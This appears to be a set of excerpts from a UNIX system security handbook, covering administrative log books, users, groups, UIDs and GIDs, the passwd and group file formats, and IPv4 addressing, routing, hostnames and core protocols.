There are basically two kinds of log books: per-site logs and per-machine logs. We'll outline the kinds of<br />

material you might want to keep in each type. Be creative, though, and don't limit yourself to what we<br />

suggest here.<br />

10.7.1 Per-Site Logs<br />

In a per-site log book, you want to keep information that would be of use across all your machines and<br />

throughout your operations. The information can be further divided into exception and activity reports,<br />

and informational material.<br />

10.7.1.1 Exception and activity reports<br />

These reports hold such information as the following:<br />

●   Time/date/duration of power outages; over time, this may help you justify uninterruptible power supplies, or help you trace the cause of frequent problems

●   Servicing and testing of alarm systems

●   Triggering of alarm systems

●   Servicing and testing of fire suppression systems

●   Visits by service personnel, including the phone company

●   Dates of employment and termination of employees with privileged access (or with any access)

10.7.1.2 Informational material<br />

This material contains such information as the following:<br />

●   Contact information for important personnel, including corporate counsel, law enforcement, field service, and others who might be involved in any form of incident

●   Copies of purchase orders, receipts, and licenses for all software installed on your systems (invaluable if you are one of the targets of a Software Publishers Association audit)

●   Serial numbers for all significant equipment on the premises

●   All machine MAC-level addresses (e.g., Ethernet addresses) with corresponding IP (or other protocol) numbers

●   Time and circumstances of formal bug reports made to the vendor

●   Phone numbers connected to your computers for dial-in/dial-out

●   Paper copy of the configuration of any routers, firewalls, or other network devices not associated with a single machine

●   Paper copy of a list of disk configurations, SCSI geometries, and partition tables and information.

10.7.2 Per-Machine Logs<br />

Each machine should also have a log book associated with it. Information in these logs, too, can be<br />

divided into exception and activity reports, and informational material:<br />

10.7.2.1 Exception and activity reports<br />

These reports hold such information as the following:<br />

●   Times and dates of any halts or crashes, including information on any special measures for system recovery

●   Times, dates, and purposes of any downtimes

●   Data associated with any unusual occurrence, such as network behavior out of the ordinary, or a disk filling up without obvious cause

●   Time and UID of any accounts created, disabled, or deleted, including the account owner, the user name, and the reason for the action.

●   Instances of changing passwords for users

●   Times and levels of backups and restores along with a count of how many times each backup tape has been used

●   Times, dates, and circumstances of software installation or upgrades

●   Times and circumstances of any maintenance activity

10.7.2.2 Informational material<br />

This material contains such information as the following:<br />

●   Copy of current configuration files, including passwd, group, and inetd.conf. (update these copies periodically, or as the files change)

●   List of patches applied from the vendor, software revision numbers, and other identifying information

●   Configuration information for any third-party software installed on the machine

●   "ls -l" listing of any setuid/setgid files on the system, and of all device files (one way to generate such a listing is sketched below)


Chapter 4<br />

4. Users, Groups, and the Superuser<br />

Contents:<br />

Users and Groups<br />

Special Usernames<br />

su: Changing Who You Claim to Be<br />

Summary<br />

In Chapter 3, Users and Passwords, we explained that every <strong>UNIX</strong> user has a user name to define an account.<br />

In this chapter, we'll describe how the operating system views users, and we'll discuss how accounts and<br />

groups are used to define access privileges for users. We will also discuss how you may assume the identity of<br />

another user or group so as to temporarily use their access rights.<br />

4.1 Users and Groups<br />

Although every UNIX user has a username of up to eight characters, inside the computer UNIX

represents each user by a single number: the user identifier (UID). Usually, the <strong>UNIX</strong> system administrator<br />

gives every user on the computer a different UID.<br />

UNIX also uses special usernames for a variety of system functions. As with usernames associated with human users, system usernames usually have their own UIDs as well. Here are some common "users" on various versions of UNIX:

●   root, the superuser, which performs accounting and low-level system functions.

●   daemon or sys, which handles some aspects of the network. This username is also associated with other utility systems, such as the print spoolers, on some versions of UNIX.

●   agent, which handles aspects of electronic mail. On many systems, agent has the same UID as daemon.

●   guest, which is used for site visitors to access the system.

●   ftp, which is used for anonymous FTP access.

●   uucp, which manages the UUCP system.

●   news, which is used for Usenet news.

●   lp, which is used for the printer system.[1]

●   nobody, which is a user that owns no files and is sometimes used as a default user for unprivileged operations.

[1] lp stands for line printer, although these days most people seem to be using laser printers.

Here is an example of an /etc/passwd file containing these system users:<br />

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh<br />

nobody:*:60001:60001::/tmp:<br />

agent:*:1:1::/tmp:<br />

daemon:*:1:1::/tmp:<br />

ftp:*:3:3:FTP User:/usr/spool/ftp:<br />

uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico<br />

news:*:6:6::/usr/spool/news:/bin/csh<br />

Notice that most of these accounts do not have "people names," and that all except root have a password field<br />

of *. This prevents people from logging into these accounts from the <strong>UNIX</strong> login: prompt, as we'll discuss<br />

later.[2]<br />

[2] This does not prevent people from logging in if there are trusted hosts/users on that account;<br />

we'll describe these later in the book.<br />

NOTE: There is nothing magical about these particular account names. All <strong>UNIX</strong> privileges are<br />

determined by the UID (and sometimes the group ID, or GID), and not directly by the account<br />

name. Thus, an account with name root and UID 1005 would have no special privileges, but an<br />

account named mortimer with UID 0 would be a superuser. In general, you should avoid creating<br />

users with a UID of 0 other than root, and you should avoid using the name root for a regular user<br />

account. In this book, we will use the terms "root" and "superuser" interchangeably.<br />

4.1.1 User Identifiers (UIDs)<br />

UIDs are historically unsigned 16-bit integers, which means they can range from 0 to 65535. UIDs between 0<br />

and 9 are typically used for system functions; UIDs for humans usually begin at 20 or 100. Some versions of<br />

<strong>UNIX</strong> are beginning to support 32-bit UIDs. In a few older versions of <strong>UNIX</strong>, UIDs are signed 16-bit integers,<br />

usually ranging from -32768 to 32767.<br />

<strong>UNIX</strong> keeps the mapping between usernames and UIDs in the file /etc/passwd. Each user's UID is stored in the<br />

field after the one containing the user's encrypted password. For example, consider the sample /etc/passwd<br />

entry presented in Chapter 3:<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

In this example, Rachel's username is rachel and her UID is 181.<br />

The UID is the actual information that the operating system uses to identify the user; usernames are provided<br />

merely as a convenience for humans. If two users are assigned the same UID, <strong>UNIX</strong> views them as the same<br />

user, even if they have different usernames and passwords. Two users with the same UID can freely read and<br />

delete each other's files and can kill each other's programs. Giving two users the same UID is almost always a<br />

bad idea; we'll discuss a few exceptions in the next section.<br />


4.1.2 Multiple Accounts with the Same UID<br />

There are two exceptions when having multiple usernames with the same UID is sensible. The first is for<br />

logins used for the UUCP system. In this case, it is desirable to have multiple UUCP logins with different<br />

passwords and usernames, but all with the same UID. This allows you to track logins from separate sites, but<br />

still allows each of them access to the shared files. Ways of securing the UUCP system are described in detail<br />

in Chapter 15, UUCP.<br />

The second exception to the rule about only one username per UID is when you have multiple people with<br />

access to a system account, including the superuser account, and you want to track their activities via the audit<br />

trail. By creating separate usernames with the same UID, and giving the users access to only one of these<br />

identities, you can do some monitoring of usage. You can also disable access for one person without disabling<br />

it for all.<br />

As an example, consider the case where you may have three people helping administer your Usenet news<br />

software and files. The password file entry for news is duplicated in the /etc/passwd file as follows:<br />

root:zPDeHbougaPpA:0:1:Operator:/:/bin/ksh<br />

nobody:*:60001:60001::/tmp:<br />

daemon:*:1:1::/tmp:<br />

ftp:*:3:3:FTP User:/usr/spool/ftp:<br />

news:*:6:6::/usr/spool/news:/bin/csh<br />

newsa:Wx3uoih3B.Aee:6:6:News co-admin Sabrina:/usr/spool/news:/bin/csh<br />

newsb:ABll2qmPi/fty:6:6:News co-admin Rachel:/usr/spool/news:/bin/sh<br />

newsc:x/qnr4sa70uQz:6:6:News co-admin Fred:/usr/spool/news:/bin/ksh<br />

Each of the three helpers has a unique password, so they can be shut out of the news account, if necessary,<br />

without denying access to the others. Also, the activities of each can now be tracked if the audit mechanisms<br />

record the account name instead of the UID (most do, as we describe in Chapter 10, Auditing and Logging).<br />

Because the first entry in the passwd file for UID 6 has the account name news, any listing of file ownership<br />

will show files belonging to user news, not to newsb or one of the other users. Also note that each user can pick<br />

his or her own command interpreter (shell) without inflicting that choice on the others.<br />

This approach should only be used for system-level accounts, not for personal accounts. Furthermore, you<br />

should institute rules in your organizations that require users (Sabrina, Rachel, and Fred) to log in to their own<br />

personal accounts first, then su to their news maintenance accounts - this provides another level of<br />

accountability and identity verification. (See the discussion of su later in this chapter.) Unfortunately, in most<br />

versions of <strong>UNIX</strong>, there is no way to enforce this requirement, except by preventing root from logging on to<br />

particular devices.<br />

4.1.3 Groups and Group Identifiers (GIDs)<br />

Every <strong>UNIX</strong> user belongs to one or more groups. Like user accounts, groups have both a groupname and a<br />

group identification number (GID). GID values are also historically 16-bit integers.<br />

As the name implies, <strong>UNIX</strong> groups are used to group users together. As with usernames, groupnames and<br />

numbers are assigned by the system administrator when each user's account is created. Groups can be used by<br />

the system administrator to designate sets of users who are allowed to read, write, and/or execute specific files,<br />

directories, or devices.<br />

Each user belongs to a primary group that is stored in the /etc/passwd file. The GID of the user's primary<br />



group follows the user's UID. Consider, again, our /etc/passwd example:<br />

rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh<br />

In this example, Rachel's primary GID is 100.<br />

Groups provide a handy mechanism for treating a number of users in a certain way. For example, you might<br />

want to set up a group for a team of students working on a project so that students in the group, but nobody<br />

else, can read and modify the team's files.<br />

Groups can also be used to restrict access to sensitive information or specially licensed applications to a<br />

particular set of users: for example, many <strong>UNIX</strong> computers are set up so that only users who belong to the<br />

kmem group can examine the operating system's kernel memory. The ingres group is commonly used to allow<br />

only registered users to execute the commercial Ingres database program. And a sources group might be<br />

limited to people who have signed nondisclosure forms so as to be able to view the source code for some<br />

software.<br />

NOTE: Some special versions of <strong>UNIX</strong> support MAC (Mandatory Access Controls), which have<br />

controls based on data labeling instead of, or in addition to, the traditional <strong>UNIX</strong> DAC<br />

(Discretionary Access Controls). MAC-based systems do not use traditional <strong>UNIX</strong> groups.<br />

Instead, the GID values and the /etc/group file may be used to specify security access control<br />

labeling or to point to capability lists. If you are using one of these systems, you should consult<br />

the vendor documentation to ascertain what the actual format and use of these values might be.<br />

4.1.3.1 The /etc/group file<br />

The /etc/group file contains the database that lists every group on your computer and its corresponding GID.<br />

Its format is similar to the format used by the /etc/passwd file.[3]<br />

[3] As with the password file, if your site is running NIS, NIS+, NetInfo, or DCE, the /etc/group<br />

file may be incomplete or missing. See the discussion in "The /etc/passwd File and Network<br />

Databases" in Chapter 3.<br />

Here is a sample /etc/group file that defines five groups: wheel, uucp, vision, startrek, and users:<br />

wheel:*:0:root,rachel<br />

uucp:*:10:uucp<br />

users:*:100:<br />

vision:*:101:keith,arlin,janice<br />

startrek:*:102:janice,karen,arlin<br />

The first line of this file defines the wheel group. The fields are explained in Table 4.1.<br />

Table 4.1: Wheel Group Fields

Field Contents    Description
wheel             The group name
*                 The group's "password" (described below)
0                 The group's GID
root, rachel      The list of the users who are in the group


Most versions of <strong>UNIX</strong> use the wheel group[4] as the list of all of the computer's system administrators (in this<br />

case, rachel and the root user are the only members). The second line of this file defines the uucp group. The<br />

only member in the uucp group is the uucp user. The third line defines the users group; the users group does<br />

not explicitly list any users; each user on this particular system is a member of the users group by virtue of<br />

their individual entries in the /etc/passwd file.<br />

[4] Not all versions of <strong>UNIX</strong> call this group wheel; this is group 0, regardless of what it is named.<br />

The remaining two lines define two groups of users. The vision group includes the users keith, arlin and janice.<br />

The startrek group contains the users janice, karen, and arlin. Notice that the order in which the usernames are<br />

listed on each line is not important. (This group is depicted graphically in Figure 4.1.)<br />

Remember, the users mentioned in the /etc/group file are in these groups in addition to the groups mentioned<br />

as their primary groups in the file /etc/passwd. For example, Rachel is in the users group even though she does<br />

not appear in that group in the file /etc/group because her primary group number is 100. On some versions of<br />

<strong>UNIX</strong>, you can issue the groups command or the id command to list which groups you are currently in.<br />
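For example (the output format differs slightly among versions; the account shown is just the rachel entry used earlier):

$ groups
users wheel
$ id
uid=181(rachel) gid=100(users) groups=100(users),0(wheel)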

Groups are handled differently by versions of System V <strong>UNIX</strong> before Release 4 and by Berkeley <strong>UNIX</strong>;<br />

SVR4 incorporates the semantics of BSD groups.<br />

NOTE: It is not necessary for there to be an entry in the /etc/group file for a group to exist! As<br />

with UIDs and account names, <strong>UNIX</strong> actually uses only the integer part of the GID for all settings<br />

and permissions. The name in the /etc/group file is simply a convenience for the users - a means<br />

of associating a mnemonic with the GID value.<br />

Figure 4.1 illustrates how users can be included in multiple groups.<br />

Figure 4.1: Users and groups<br />


4.1.3.2 Groups and older AT&T <strong>UNIX</strong><br />

Under versions of AT&T <strong>UNIX</strong> before SVR4, a user can occupy only a single group at a time. To change your<br />

current group, you must use the newgrp command. The newgrp command takes a single argument: the name of<br />

the group that you're attempting to change into. If the newgrp command succeeds, it execs a shell that has a<br />

different GID, but the same UID:<br />

$ newgrp news<br />

$<br />

This is similar to the su command used to change UID.<br />

Usually, you'll want to change into only those groups in which you're already a member; that is, groups that

have your username mentioned on their line in the /etc/group file. However, the newgrp command also allows<br />

you to change into a group of which you're not normally a member. For this purpose, <strong>UNIX</strong> uses the group<br />

password field of the /etc/group file. If you try to change into a group of which you're not a member, the<br />

newgrp command will prompt you for that group's password. If the password you type agrees with the<br />

password for the group stored in the /etc/group file, the newgrp command temporarily puts you into the group<br />

by spawning a subshell with that group:<br />

$ newgrp fiction<br />

password: rates34<br />

$<br />

You're now free to exercise all of the rights and privileges of the fiction group.<br />

The password in the /etc/group file is interpreted exactly like the passwords in the /etc/passwd file, including salts (described in Chapter 8, Defending Your Accounts). However, most systems do not have a program to install or change the passwords in this file. To set a group password, you must first assign it to a user with the passwd command, then use a text editor to copy the encrypted password out of the /etc/passwd file and into the /etc/group file. Alternatively, you can encode the password using the /usr/lib/makekey program (if present) and edit the result into the /etc/group file in the appropriate place.[5]

[5] We suspect that passwords have seldom been used in the group file. Otherwise, by now someone would have developed an easier, one-step method of updating the passwords. UNIX gurus tend to write tools for anything they have to do more than twice that requires more than a few simple steps. Updating passwords in the group file is an obvious candidate, but a corresponding tool has not been developed. Ergo, the operation must not be common.

NOTE: Some versions of UNIX, such as AIX, do not support group passwords.
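To make the mechanics concrete, a group entry that carries a password is simply an ordinary /etc/group line with its second field filled in. The group below is the fiction group from the example above, but the GID and the 13-character password hash are made up for illustration:

fiction:Xk3jYbM9pQw2.:120:

Because no members are listed (and assuming no account uses this GID as its primary group in /etc/passwd), the only way into the group is to run newgrp fiction and supply the password, which is exactly the situation described below for BSD and SVR4 systems.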

4.1.3.3 Groups and BSD or SVR4 UNIX

One of the many enhancements that the Berkeley group made to the UNIX operating system was to allow users to reside in more than one group at a time. When a user logs in to a Berkeley UNIX system, the program /bin/login scans the entire /etc/group file and places the user into all of the groups in which that user is listed.[6] The user is also placed in the primary group listed in the user's /etc/passwd file entry. When the system needs to determine access rights to something based on the user's membership in a group, it checks all the current groups for the user to determine if that access should be granted (or denied).

[6] If you are on a system that uses NIS, NIS+, or some other system for managing user accounts throughout a network, these network databases will be referenced as well. For more information, see Chapter 19, RPC, NIS, NIS+, and Kerberos.

Thus, Berkeley and SVR4 UNIX have no obvious need for the newgrp command - indeed, many versions do not include it. However, there may be a need for it in some cases. If you have a group entry with no users listed but a valid password field, you might want to have some users run the newgrp program to enter that group. This action will be logged in the audit files, and can be used for accounting or activity tracking. However, situations where you might want to use this are likely to be rare. Note also that some systems, including AIX, do not support use of a password in the /etc/group file, although they may allow use of the newgrp command to change the primary group.



Chapter 16
TCP/IP Networks

16.2 IPv4: The Internet Protocol Version 4

The Internet Protocol is the glue that holds together modern computer networks. IP specifies the way that messages are sent from computer to computer; it essentially defines a common "language" that is spoken by every computer stationed on the Internet.

This section describes IPv4, the fourth version of the Internet Protocol, which has been used on the Internet since 1982. As this book is going to press, work is continuing on IPv6, previously called "IP: The Next Generation," or IPng. (IPv5 was an experimental protocol that was never widely used.) We do not know when (or if) IPv6 will be widely used on the network.

As we said earlier, at a very abstract level the Internet is similar to the phone network. However, as we look more closely at the underlying protocols, we find that it is quite different. On the telephone network, each conversation is assigned a circuit (either a pair of wires or a channel on a multiplexed connection) that it uses for the duration of the telephone call. Whether you talk or not, the channel remains open until you hang up the phone.

On the Internet, the connections between computers are shared by all of the conversations. Data is sent in blocks of characters called datagrams, or more colloquially, packets. Each packet has a small block of bytes called the header, which identifies its sender and intended destination on each computer. The header is followed by another, usually larger, block of characters of data called the packet's contents. (See Figure 16.3.) After the packets reach their destination, they are often reassembled into a continuous stream of data; this fragmentation and reassembly process is usually invisible to the user. As there are often many different routes from one system to another, each packet may take a slightly different path from source to destination. Because the Internet switches packets, instead of circuits, it is called a packet-switching network.

Figure 16.3: IP header and packet


We'll borrow an analogy from Vint Cerf, one of the original architects of the ARPANET: think of the IP protocol as sending a novel a page at a time, numbered and glued to the back of postcards. All the postcards from every user get thrown together and carried by the same trucks to their destinations, where they get sorted out. Sometimes, the postcards get delivered out of order. Sometimes, a postcard may not get delivered at all, but you can use the page numbers to request another copy. And, key for security, anyone in the postal service who handles the postcards can read the contents without the recipient or sender knowing about it.

There are three distinct ways to directly connect two computers together using IP:

● The computers can all be connected to the same local area network. Two common LANs are Ethernet and token ring. Internet packets are then encapsulated within the packets used by the local area network.[4]

[4] These LANs can also carry protocols other than IP (including Novell IPX and AppleTalk), often at the same time as IP network traffic.

● Two computers can be directly connected to each other with a serial line. IP packets are then sent using either SLIP (Serial Line Internet Protocol), CSLIP (Compressed SLIP), or PPP (Point-to-Point Protocol). If both computers are each in turn connected to a local area network, the telephone link will bridge together the two LANs. (See Figure 16.4.)

● The IP packets can themselves be encapsulated within packets used by other network protocols. Today, many 56K "leased lines" are actually built by encapsulating IP packets within Frame Relay packets. Within a few years, IP may be commonly encapsulated within ATM (Asynchronous Transfer Mode) networks.[5]

[5] If our use of all these network terms is causing your eyes to roll back into your head and a loud buzzing sound to fill your ears, take a break and several deep breaths. Then consult a book on IP and networks for a more complete explanation. We recommend the excellent Internetworking with TCP/IP by Doug Comer (Prentice Hall, 1991).

Figure 16.4: Bridging two local area networks


IP is a scalable network protocol: it works as well with a small office network of ten workstations as it does with a university-sized network supporting a few hundred workstations, or with the national (and international) networks that support tens of thousands of computers. IP scales because it views these large networks merely as collections of smaller ones. Computers connected to a network are called hosts. Computers that are connected to two or more networks can be programmed to forward packets automatically from one network to another; today, these computers are called routers (originally they were called gateways). Routers use routing tables to determine where to send packets next.

16.2.1 Internet Addresses

Every interface that a computer has on an IP network is assigned a unique 32-bit address. These addresses are often expressed as a set of four 8-bit numbers, called octets. A sample address is 18.70.0.224. Think of an IP address as if it were a telephone number: if you know a computer's IP address, you can connect to it and exchange information.

Theoretically, the 32-bit IP address allows a maximum of 2^32 = 4,294,967,296 computers to be attached to the Internet at a given time. In practice, the total number of computers that can be connected is much less, because of the way that IP addresses are assigned. Organizations are usually assigned blocks of addresses, not all of which are used. This approach is similar to the method by which the phone company assigns area codes to a region. The approach has led to a problem with IP addresses similar to that faced by the telephone company: we're running out of numbers.

Here are some more sample Internet addresses:

18.85.0.2
198.3.5.1
204.17.195.100

IP addresses are typically abbreviated ii.jj.kk.ll, where the numbers ii, jj, kk, and ll are between 0 and 255. Each decimal number represents an 8-bit octet. Together, they represent the 32-bit IP address.
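As a quick check of that arithmetic, the dotted form is simply the four octets packed into a single 32-bit number. In a shell with C-style arithmetic (bash, for example), the sample address 18.70.0.224 works out like this:

$ echo $(( (18 << 24) + (70 << 16) + (0 << 8) + 224 ))
306577632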


16.2.1.1 IP networks

The Internet is a network of networks. Although most people think of these networks as major networks, such as those belonging to companies like AT&T, MCI, and Sprint, the networks that make up the Internet are actually local area networks, such as the network in your office building or the network in a small research laboratory. Each of these small networks is given its own network number.

There are two methods of looking at network numbers. The "classical" network numbers were distinguished by a unique prefix of bits in the address of each host in the network. This approach partitioned the address space into a well-defined set of different-size networks. However, several of these networks had large "holes" - sets of host addresses that were never used. With the explosion of sites on the Internet, a somewhat different interpretation of network addresses has been proposed, to yield some additional addresses that can be assigned to networks and hosts. This approach is the CIDR (Classless InterDomain Routing) scheme. We briefly describe both schemes below.

The CIDR method may not be adequate to provide addresses for all the expected hosts on the network; therefore, as we've mentioned, a new protocol, IPv6, is being developed. This new protocol will provide a bigger address space for hosts and networks, and will provide some additional security features. Host addresses will be 128 bits long in IPv6. As this book goes to press, the features of IPv6 are not completely finalized, so we won't try to detail them here.[6]

[6] But you can be sure we'll cover them in the next edition!

16.2.1.2 Classical network addresses

There are five primary kinds of IP addresses in the "classical" address scheme; the first few bits of the address (the most significant bits) define the class of network to which the address belongs. The remaining bits are divided into a network part and a host part:

Class A addresses

Hosts on Class A networks have addresses in the form N.a.b.c, where N is the network number and a.b.c is the host number; the most significant bit of N must be zero. There are not many Class A networks, as they are quite wasteful: unless your network has 16,777,216 separate hosts, you don't need a Class A network. Nevertheless, many early pioneers of the Internet, such as MIT and Bolt Beranek and Newman (BBN), have been assigned Class A networks. Of course, these organizations don't really put all of their computers on the same piece of network. Instead, most of them divide their internal networks as (effectively) Class B or Class C networks. This approach is known as subnetting.

Class B addresses

Hosts on Class B networks have addresses in the form N.M.a.b, where N.M is the network number and a.b is the host number; the most significant two bits of N must be 10. Class B networks are commonly found at large universities and major commercial organizations.

Class C addresses

Hosts on Class C networks have addresses in the form N.M.O.a, where N.M.O is the network number and a is the host number; the most significant three bits of N must be 110. These networks can only accommodate a maximum of 254 hosts. (Flaws and incompatibilities between various UNIX IP implementations make it unwise to assign IP addresses ending in 0 or 255.) Most organizations have one or more Class C networks.

Class D addresses

A Class D address is of the form N.M.O.a, where the most significant four bits of N are 1110. These addresses are not actually addresses of networks, but of multicast groups - sets of hosts that listen on a common address to receive broadcast transmissions.

Class E addresses

A Class E address is of the form N.M.O.P, where the most significant four bits of N are 1111. These addresses are currently reserved for experimental use.

16.2.1.3 CIDR addresses

In recent years, a new form of address assignment has been developed: the CIDR, or Classless InterDomain Routing, method. As the name implies, there are no "classes" of addresses as in the classical scheme. Instead, networks are defined as being the most significant k bits of each address, with the remaining 32-k bits being used for the host part of the address. Thus, a service provider could be given a range of addresses whereby the first 12 bits of the address are fixed at a particular value (the network address), and the remaining 20 bits represent the host portion of the address. This method allows the service provider to allocate up to 2^20 distinct addresses to customers.

In reality, the host portion of an address is further divided into subnets. This subdivision is done by fixing the first j bits of the host portion of the address to some set value, and using the remaining bits for host addresses. And those can be further divided into subnets, and so on. A CIDR-format address is of the form k.j.l.(m...n), where each of the fields is of variable length. Thus, the fictional service-provider network address described above could be subdivided into 1024 subnets, one for each customer. Each customer would then have 10 bits of host address, which they could further subdivide into local subnets.

The CIDR scheme is compatible with the classical address format, with Class A addresses using an 8-bit network field, Class B networks using a 16-bit network address, and so on. CIDR is being adopted as this book goes to press. Combined with new developments in IP address rewriting, there is the potential to spread out the useful life of IPv4 for many years to come.
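To make the bit counting in that example concrete (the 12-bit provider prefix and the 1024-customer split are the hypothetical figures used above, not a real allocation), a bash-style shell can do the arithmetic directly:

$ echo $(( 1 << 20 ))     # host addresses left after a 12-bit network prefix
1048576
$ echo $(( 1 << 10 ))     # host addresses per customer after a further 10-bit subnet split
1024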

16.2.2 Routing

Despite the complexity of the Internet and its addressing, computers can easily send each other messages across the global network. To send a packet, most computers simply set the packet's destination address and then send the packet to a computer on their local network called a gateway. If the gateway makes a determination of where to send the packet next, the gateway is a router. The router takes care of sending the packet to its final destination by forwarding the packet on to a directly connected gateway that is one step closer to the destination host.

Many organizations configure their internal networks as a large tree. At the root of the tree is the organization's connection to the Internet. When a gateway receives a packet, it decides whether to send it to one of its own subnetworks, or to direct it towards the root.

Out on the Internet, major IP providers such as AT&T, BBN Planet, MCI, and Sprint have far more complicated networks with sophisticated routing algorithms. Many of these providers have redundant networks, so that if one link malfunctions, other links can take over.

Nevertheless, from the point of view of any computer on the Internet, routing is transparent, regardless of whether packets are being sent across the room or across the world. The only information that you need to know to make a connection to another computer on the Internet is the computer's 32-bit IP address - you do not need to know the route to the host, or on what type of network the host resides. You do not even need to know if the host is connected by a high-speed local area network, or if it is at the other end of a modem-based SLIP connection. All you need to know is its address, and your packets are on their way.

Of course, if you are the site administrator and you are configuring the routing on your system, you do need to be concerned with a little more than the IP number of a destination machine. You must know at least the addresses of the gateways out of your network so you can configure your routing tables. We'll assume you know how to do that,[7] but we will point out that if your routes are fairly stable and simple, you would be safer setting the routes statically rather than allowing them to be set dynamically with a mechanism such as the routed daemon.

[7] If not, you should consult your vendor manual, or one of the references in Appendix D, Paper Sources.
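If you do set routes statically, the traditional BSD-style route command takes roughly the following form; the gateway address here is made up, and the exact syntax (including whether a hop-count metric is required) varies from vendor to vendor, so check your manual:

# route add default 192.42.0.254 1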

16.2.3 Hostnames

A hostname is the name of a computer on the Internet. Hostnames make life easier for users: they are easier to remember than IP addresses. You can change a computer's IP address but keep its hostname the same. If you think of an IP address as a computer's phone number, think of its hostname as the name under which it is listed in the telephone book. Some hosts can also have more than one address on more than one network. Rather than needing to remember each one, you can remember a single hostname and let the underlying network mechanisms pick the most appropriate addresses to use.

Let us repeat that: a single hostname can have more than one IP address, and a single IP address can be associated with more than one hostname. Both of these facts have profound implications for people who are attempting to write secure network programs.

Hostnames must begin with a letter or number and may contain letters, numbers, and a few symbols, such as the dash (-). Case is ignored. A sample hostname is arthur.cs.purdue.edu. For more information on hostnames, see RFC 1122 and RFC 1123.

Each hostname has two parts: the computer's machine name and its domain. The computer's machine name is the name to the left of the first period; the domain name is everything to the right of the first period. In our example above, the machine name is arthur and the domain is cs.purdue.edu. The domain name may represent further hierarchical domains if there is a period in the name. For instance, cs.purdue.edu represents the Computer Sciences department domain, which is part of the Purdue University domain, which is, in turn, part of the Educational Institutions domain.

Here are some other examples:

whitehouse.gov
next.cambridge.ma.us
jade.tufts.edu

If you specify a machine name, but do not specify a domain, then your computer might append a default domain when it tries to resolve the name's IP address. Alternatively, your computer might simply return an "unknown host" error message.

16.2.3.1 The /etc/hosts file

Early UNIX systems used a single file called /etc/hosts to keep track of the network address for each host on the Internet. Many systems still use this file today to keep track of the IP addresses of computers on the organization's LAN.

A sample /etc/hosts file for a small organization might look like this:

# /etc/hosts
#
192.42.0.1    server
192.42.0.2    art
192.42.0.3    science       sci
192.42.0.4    engineering   eng

In this example, the computer called server has the network address 192.42.0.1. The computer called engineering has the address 192.42.0.4. The hostname sci following the computer called science means that sci can be used as a second name, or alias, for that computer.

In the early 1980s, the number of hosts on the Internet started to jump from thousands to tens of thousands and more. Maintaining a single file of host names and addresses soon proved to be impossible. Instead, the Internet adopted a distributed system for hostname resolution known as the Domain Name System (DNS). For more information, see the "Name Service" section later in this chapter.

16.2.4 Packets and Protocols

Today there are four main kinds of IP packets that are sent on the Internet and that will be seen by typical hosts. Each is associated with a particular protocol:[8]

[8] There may be some special routing or maintenance protocols in use on the Internet backbone or other major network trunks. However, we won't discuss them here, as you are unlikely to ever encounter them.

ICMP

Internet Control Message Protocol. This protocol is used for low-level operation of the IP protocol. There are several subtypes, for example, for the exchange of routing and traffic information.

TCP

Transmission Control Protocol. This protocol is used to create a two-way stream connection between two computers. It is a "connected" protocol, and includes time-outs and retransmission to ensure reliable delivery of information.

UDP

User Datagram Protocol.[9] This protocol is used to send packets from host to host. The protocol is "connectionless" and makes a best-effort attempt at delivery.

[9] UDP does not stand for Unreliable Datagram Protocol, even though the protocol is technically unreliable because it does not guarantee that information sent will be delivered. We use the term best-effort because the underlying network infrastructure is expected to make its best effort to get the packets to their destination. In fact, most UDP packets reach their destination under normal operating circumstances.

IGMP

Internet Group Management Protocol. This protocol is used to control multicasting - the process of purposely directing a packet to more than one host. Multicasting is the basis of the Internet's multimedia backbone, the MBONE. (Currently, IGMP is not used inside the MBONE, but is used on the edge.)

16.2.4.1 ICMP

The Internet Control Message Protocol is used to send messages between gateways and hosts regarding the low-level operation of the Internet. For example, ICMP Echo packets are commonly used to test for network connectivity; the response is usually either an ICMP Echo Reply or an ICMP Destination Unreachable message type. ICMP packets are identified by an 8-bit TYPE field (see Table 16.1):

Table 16.1: ICMP Packet Types

TYPE Field   ICMP Message Type
0            Echo Reply (used by ping)
3            Destination Unreachable
4            Source Quench
5            Redirect (change a route)
8            Echo Request (used by ping)
9            Router Advertisement
10           Router Solicitation
11           Time Exceeded for a Datagram
12           Parameter Problem on a Datagram
13           Timestamp Request
14           Timestamp Reply
15           Information Request (obsolete)
16           Information Reply (obsolete)
17           Address-Mask Request
18           Address-Mask Reply

Although we have included all types for completeness, the most important types for our purposes are types 3, 4, and 5. An attacker can craft ICMP packets with these fields to redirect your network traffic away, or to perform a denial of service. If you use a firewall (discussed in Chapter 21, Firewalls), you will want to be sure that these types are blocked or monitored.
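The familiar ping command exercises types 8 and 0. On systems whose ping takes a packet-count flag, a single probe looks roughly like the following; the host, address, and timing figures are only illustrative:

$ ping -c 1 server
PING server (192.42.0.1): 56 data bytes
64 bytes from 192.42.0.1: icmp_seq=0 ttl=255 time=1.8 ms

--- server ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss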

16.2.4.2 TCP

TCP provides a reliable, ordered, two-way transmission stream between two programs that are running on the same or different computers. "Reliable" means that every byte transmitted is guaranteed to reach its destination (or you are notified that the transmission failed), and that each byte arrives in the order in which it is sent. Of course, if the connection is physically broken, bytes that have not yet been transmitted will not reach their destination unless an alternate route can be found. In such an event, the computer's TCP implementation will send an error message to the process that is trying to send or receive characters, rather than give the impression that the link is still operational.

Each TCP connection is attached at each end to a port. Ports are identified by 16-bit numbers. Indeed, at any instant, every connection on the Internet can be identified by a set of two 32-bit numbers and two 16-bit numbers:

● Host address of the connection's originator
● Port number of the connection's originator
● Host address of the connection's target
● Port number of the connection's target

For example, Figure 16.5 shows three people on three separate workstations logged into a server using the rlogin program. Each process's TCP connection starts on a different host and at a different originating port number, but each connection terminates on the same host (the server) and the same port (513).

Figure 16.5: A few Internet connections with port numbers


The idea that the workstations are all connecting to port number 513 can be confusing. Nevertheless, these are all distinct connections, because each one is coming from a different originating host-port pair, and the server moves each connection to a separate, higher-numbered port.

